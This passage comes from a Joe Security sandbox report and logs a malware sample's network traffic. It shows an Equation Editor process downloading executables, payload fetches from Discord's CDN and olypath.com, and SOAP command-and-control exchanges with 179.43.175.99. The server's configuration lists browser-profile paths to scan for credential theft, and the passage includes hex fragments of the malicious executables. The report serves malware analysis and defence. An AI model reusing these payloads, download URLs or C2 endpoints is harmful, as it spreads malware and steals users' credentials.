8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com
162.159.133.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET
8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com
162.159.135.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET
8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com
162.159.134.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:31.109594107 CET
8.8.8.8 192.168.2.22 0x1af8 No error (0) cdn.discordapp.com
162.159.129.233 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:32.183111906 CET
8.8.8.8 192.168.2.22 0x3b9 No error (0) olypath.com 178.18.193.160 A (IP address) IN (0x0001)
Feb 22, 2022 15:30:47.235760927 CET
8.8.8.8 192.168.2.22 0x6392 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net
CNAME (Canonical name)
IN (0x0001)
Feb 22, 2022 15:30:47.282295942 CET
8.8.8.8 192.168.2.22 0xaa45 No error (0) api.ip.sb api.ip.sb.cdn.cloudflare.net
CNAME (Canonical name)
IN (0x0001)
cdn.discordapp.com
103.171.0.134
olypath.com
179.43.175.99:21900
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.22 49166 162.159.130.233 443 C:\Users\Public\vbc.exe
TimestampkBytestransferred
Direction Data
UDP Packets
DNS Queries
DNS Answers
HTTP Request Dependency Graph
HTTP Packets
Copyright Joe Security LLC 2022 Page 34 of 65
Session ID Source IP Source Port Destination IP Destination Port Process
1 192.168.2.22 49165 103.171.0.134 80 C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
TimestampkBytestransferred
Direction Data
Feb 22, 2022 15:30:27.613562107 CET
0 OUT GET /_spaceX2__/.win32.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.0.134Connection: Keep-Alive
Feb 22, 2022 15:30:27.935863018 CET
1 IN HTTP/1.1 200 OKDate: Tue, 22 Feb 2022 14:30:25 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 22 Feb 2022 07:24:47 GMTETag: "3800-5d8963e65e9ce"Accept-Ranges: bytesContent-Length: 14336Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 8f 14 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 2e 00 00 00 08 00 00 00 00 00 00 de 4d 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 4d 00 00 53 00 00 00 00 60 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 50 4c 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 2d 00 00 00 20 00 00 00 2e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 60 00 00 00 06 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 4d 00 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 31 00 00 78 1a 00 00 03 00 00 00 39 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 11 02 00 00 01 00 00 11 28 0b 00 00 0a 16 8d 13 00 00 01 6f 0c 00 00 0a 14 fe 06 0d 00 00 0a 73 0e 00 00 0a 28 01 00 00 2b 28 02 00 00 2b 0a 28 0b 00 00 0a 0b 38 bf 01 00 00 07 16 8d 13 00 00 01 6f 0c 00 00 0a 28 03 00 00 2b 0c 08 16 9a 25 13 08 39 9c 01 00 00 11 08 72 01 00 00 70 28 11 00 00 0a 2d 40 11 08 72 13 00 00 70 28 11 00 00 0a 2d 61 11 08 72 1b 00 00 70 28 11 00 00 0a 2d 6a 11 08 72 23 00 00 70 28 11 00 00 0a 2d 73 11 08 72 2f 00 00 70 28 11 00 00 0a 3a dd 00 00 00 38 4e 01 00 00 08 17 9a 28 0d 00 00 0a 0d 09 16 32 13 09 06 8e 69 2f 0d 09 06 28 06 00 00 06 0a 38 2e 01 00 00 72 39 00 00 70 28 12 00 00 0a 38 1f 01 00 00 08 17 9a 13 04 11 04 06 28 05 00 00 06 28 12 00 00 0a 38 08 01 00 00 08 17 9a 13 04 11 04 06 28 04 00 00 06 28 12 00 00 0a 38 f1 00 00 00 08 18 9a 13 04 08 17 9a 28 0d 00 00 0a 13 05 11 05 06 8e 69 30 59 73 13 00 00 0a 13 06 11 06 72 55 00 00 70 6f 14 00 00 0a 26 11 06 72 59 00 00 70 11 04 11 05 06 28 03 00 00 06 28 04 00 00 2b 6f 14 00 00 0a 26 11 06 72 5f 00 00 70 6f 14 00 00 0a 26 11 06 6f 16 00 00 0a 16 8d 13 00 00 01 6f 17 00 00 0a 28 12 00 00 0a 38 82 00 00 00 72 63 00 00 70 28 12 00 00 0a 2b 76 08 18 9a 13 04 08 17 9a 28 0d 00 00 0a 13 05 11 05 06 8e 69 30 56 73 13 00 00 0a 13 07 11 07 72 55 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb.M `@ @MS`PL H.text- . `.rsrc`0@@.reloc6@BMH1x90(os(+(+(8o(+%9rp(-@rp(-arp(-jr#p(-sr/p(:8N(2i/(8.r9p(8((8((8(i0YsrUpo&rYp((+o&r_po&oo(8rcp(+v(i0VsrU
Session ID Source IP Source Port Destination IP Destination Port Process
2 192.168.2.22 49167 178.18.193.160 80 C:\Users\Public\vbc.exe
TimestampkBytestransferred
Direction Data
Feb 22, 2022 15:30:32.230215073 CET
219 OUT GET /RLBIl.exe HTTP/1.1Host: olypath.comConnection: Keep-Alive
Feb 22, 2022 15:30:32.279639006 CET
220 IN HTTP/1.1 200 OKConnection: Keep-AliveContent-Type: application/x-msdownloadLast-Modified: Tue, 22 Feb 2022 11:23:44 GMTAccept-Ranges: bytesContent-Length: 97792Date: Tue, 22 Feb 2022 14:30:32 GMTServer: LiteSpeed
Session ID Source IP Source Port Destination IP Destination Port Process
3 192.168.2.22 49168 179.43.175.99 21900 C:\Users\Public\vbc.exe
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 35 of 65
Feb 22, 2022 15:30:41.645224094 CET
322 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 179.43.175.99:21900Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Feb 22, 2022 15:30:41.693612099 CET
322 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:30:41.725904942 CET
322 IN HTTP/1.1 200 OKContent-Length: 212Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:30:41 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Feb 22, 2022 15:30:46.752407074 CET
323 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 179.43.175.99:21900Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Feb 22, 2022 15:30:46.773400068 CET
323 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:30:46.841787100 CET
324 IN HTTP/1.1 200 OKContent-Length: 4744Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:30:46 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 36 of 65
Session ID Source IP Source Port Destination IP Destination Port Process
4 192.168.2.22 49170 179.43.175.99 21900 C:\Users\Public\vbc.exe
TimestampkBytestransferred
Direction Data
Feb 22, 2022 15:31:01.824354887 CET
335 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 179.43.175.99:21900Content-Length: 152164Expect: 100-continueAccept-Encoding: gzip, deflate
Feb 22, 2022 15:31:01.847295046 CET
335 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:31:02.210525036 CET
486 IN HTTP/1.1 200 OKContent-Length: 147Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:31:02 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Feb 22, 2022 15:31:02.212336063 CET
486 OUT POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 179.43.175.99:21900Content-Length: 152156Expect: 100-continueAccept-Encoding: gzip, deflate
Feb 22, 2022 15:31:02.232909918 CET
486 IN HTTP/1.1 100 Continue
Feb 22, 2022 15:31:02.304461002 CET
637 IN HTTP/1.1 200 OKContent-Length: 261Content-Type: text/xml; charset=utf-8Server: Microsoft-HTTPAPI/2.0Date: Tue, 22 Feb 2022 14:31:02 GMTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>
Session ID Source IP Source Port Destination IPDestinationPort
Process
0 192.168.2.22 49166 162.159.130.233 443 C:\Users\Public\vbc.exe
TimestampkBytestransferred
Direction Data
2022-02-22 14:30:32 UTC 0 OUT GET /attachments/926046144130351104/945362888414072923/httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htme HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
HTTPS Proxied Packets
Copyright Joe Security LLC 2022 Page 37 of 65
2022-02-22 14:30:32 UTC 0 IN HTTP/1.1 200 OKDate: Tue, 22 Feb 2022 14:30:32 GMTContent-Type: application/octet-streamContent-Length: 190464Connection: closeCF-Ray: 6e18e9b23d876919-FRAAccept-Ranges: bytesAge: 49351Cache-Control: public, max-age=31536000Content-Disposition: attachment;%20filename=httpsgithub.comrakam-iorecipesblobmastersegmentstripestripe_balance.model.jsonnet.htmeETag: "e04ef1d0eae2971046e9cf8048fdf708"Expires: Wed, 22 Feb 2023 14:30:32 GMTLast-Modified: Mon, 21 Feb 2022 16:54:36 GMTVary: Accept-EncodingCF-Cache-Status: HITAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"x-goog-generation: 1645462476625965x-goog-hash: crc32c=SNuxog==x-goog-hash: md5=4E7x0OrilxBG6c+ASP33CA==x-goog-metageneration: 1x-goog-storage-class: STANDARDx-goog-stored-content-encoding: identityx-goog-stored-content-length: 190464X-GUploader-UploadID: ADPycdvVV7eWCzW3kX5n78ji9Yv3dpUPb1irIctXNyCwHGIC8y-2OJTqv6I66Oi16Ll6sIBUKRbxB6a1LgoiRchMOxcX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
2022-02-22 14:30:32 UTC 1 IN Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 7a 58 36 4a 68 4e 73 64 34 25 32 46 54 79 69 76 42 6b 72 65 56 62 5a 58 30 51 25 32 42 32 73 78 72 33 35 6a 65 6a 76 31 33 72 76 6a 68 66 6d 6a 7a 73 7a 7a 6a 25 32 46 70 79 70 79 53 50 44 4e 42 41 63 58 35 6f 61 49 73 49 7a 64 38 78 38 6c 6c 25 32 42 38 34 62 48 57 66 34 5a 39 59 50 6b 67 54 47 78 6a 37 70 66 35 6c 43 25 32 46 30 57 34 54 39 70 6a 76 39 59 45 7a 36 68 36 44 69 78 62 77 53 38 62 70 34 47 36 36 59 4c 6d 57 7a 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zX6JhNsd4%2FTyivBkreVbZX0Q%2B2sxr35jejv13rvjhfmjzszzj%2FpypySPDNBAcX5oaIsIzd8x8ll%2B84bHWf4Z9YPkgTGxj7pf5lC%2F0W4T9pjv9YEz6h6DixbwS8bp4G66YLmWzw%3D%3D"}],"group":"cf-nel","max_a
2022-02-22 14:30:32 UTC 1 IN Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 85 03 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b6 02 00 00 30 00 00 00 00 00 00 ae d4 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL2b!0 @ @`
2022-02-22 14:30:32 UTC 2 IN Data Raw: fe 0c 02 00 58 4a 54 fe 0c 04 00 fe 0c 0e 00 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 58 fe 0e 0e 00 fe 0c 01 00 20 08 00 00 00 58 fe 0e 01 00 38 d3 fd ff ff fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 61 54 fe 0c 04 00 fe 0c 0e 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 6c fd ff ff fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 80 01 00 00 04 fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 3f fd ff ff 20 01 00 00 00 fe 0e 0b 00 38 31 fd ff ff 00 2a 1a 28 01 00 00 0a 2a 2a fe 09 00 00 28 02 00 00 0a 2a 00 13 30 03 00 32 00 00 00 00 00 00 00 20 02 00 00 00 8d Data Ascii: XJT X X8 Y YJ YJaT Y Y8l YJ Y8? 81*(**(*02
2022-02-22 14:30:32 UTC 4 IN Data Raw: 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 02 00 fe 0c 0c 00 fe 0c 01 00 fe 0c 00 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 0b 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 cc fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 9a 74 03 00 00 02 7e 04 00 00 04 fe 0c 00 00 fe 0c 0e 00 58 4a 97 29 06 00 00 11 fe 0c 0c 00 20 01 00 00 00 59 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 82 fe ff ff fe 0c 00 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 05 00 5a 58 fe 0e 00 00 38 53 fe ff ff 00 2a 2a fe 09 00 00 28 08 00 00 0a 2a 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 0c 00 00 06 2a 00 00 13 30 03 Data Ascii: 8888XJ X X8 Yt~XJ) Y X8((%~a Y ZX8S**(*0(*0
2022-02-22 14:30:32 UTC 5 IN Data Raw: 07 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 04 00 00 1b 80 08 00 00 04 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 38 51 fc ff ff 00 38 4b fc ff ff fe 0c 05 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0b 00 5a 58 fe 0e 05 00 38 1c fc ff ff 00 2a 00 00 13 30 06 00 7a 03 00 00 0c 00 00 11 fe 0d 06 00 25 20 01 00 00 00 54 46 fe 0e 0a 00 fe 0c 0a 00 20 04 00 00 00 5a fe 0e 03 00 fe 0c 0a 00 20 08 00 00 00 5a fe 0e 0e 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 00 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 7f 4d 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 0d 00 Data Ascii: Yt Y8Q8K((%~a Y ZX8*0z% TF Z Z % M
